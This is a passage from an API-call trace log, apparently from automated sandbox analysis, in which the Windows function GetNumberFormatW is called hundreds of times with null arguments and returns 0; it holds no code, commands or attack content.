GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.555] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.556] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.557] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.558] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0055.559] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) 